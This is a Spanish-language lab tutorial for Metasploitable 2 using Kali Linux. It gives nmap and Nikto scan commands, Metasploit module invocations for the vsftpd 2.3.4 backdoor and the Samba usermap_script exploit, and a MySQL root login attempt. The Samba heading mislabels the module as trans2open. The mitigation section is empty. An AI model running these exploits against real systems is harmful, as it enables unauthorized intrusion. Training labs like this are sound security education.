Tabla de Contenidos

Plan de Evaluación y Explotación de Vulnerabilidades en Metasploitable 2

Plan detallado para comprobar las vulnerabilidades de Metasploitable 2 usando Kali Linux. Este plan está diseñado de manera didáctica para que sea fácil de seguir y entender. Metasploitable 2 es una máquina virtual vulnerable diseñada específicamente para pruebas de seguridad y formación en ciberseguridad.

Paso 1: Configuración del Entorno

Paso 2: Reconocimiento

Identificar la dirección IP de Metasploitable 2

sudo nmap -sn 192.168.0.0/24

Escaneo de Puertos y Servicios

sudo nmap -A -T4 <IP-de-Metasploitable2>

Paso 3: Identificación de Vulnerabilidades

Buscar servicios vulnerables

Uso de Nikto para análisis de vulnerabilidades web

sudo nikto -h <IP-de-Metasploitable2>

Paso 4: Explotación de Vulnerabilidades

A continuación, se describen algunas vulnerabilidades comunes en Metasploitable 2 y cómo explotarlas.

Explotación de VSFTPD 2.3.4

sudo msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST <IP-de-Metasploitable2>
exploit

Explotación de Samba (SMB) usando el exploit de trans2open

sudo msfconsole
use exploit/multi/samba/usermap_script
set RHOST <IP-de-Metasploitable2>
exploit

Explotación de una vulnerabilidad en la base de datos MySQL

mysql -u root -p -h <IP-de-Metasploitable2>

Paso 5: Documentación y Mitigación

Conclusión

Este plan proporciona una guía completa para la evaluación y explotación de vulnerabilidades en Metasploitable 2 usando Kali Linux. Cada paso incluye instrucciones detalladas y comandos específicos para facilitar el aprendizaje y la comprensión.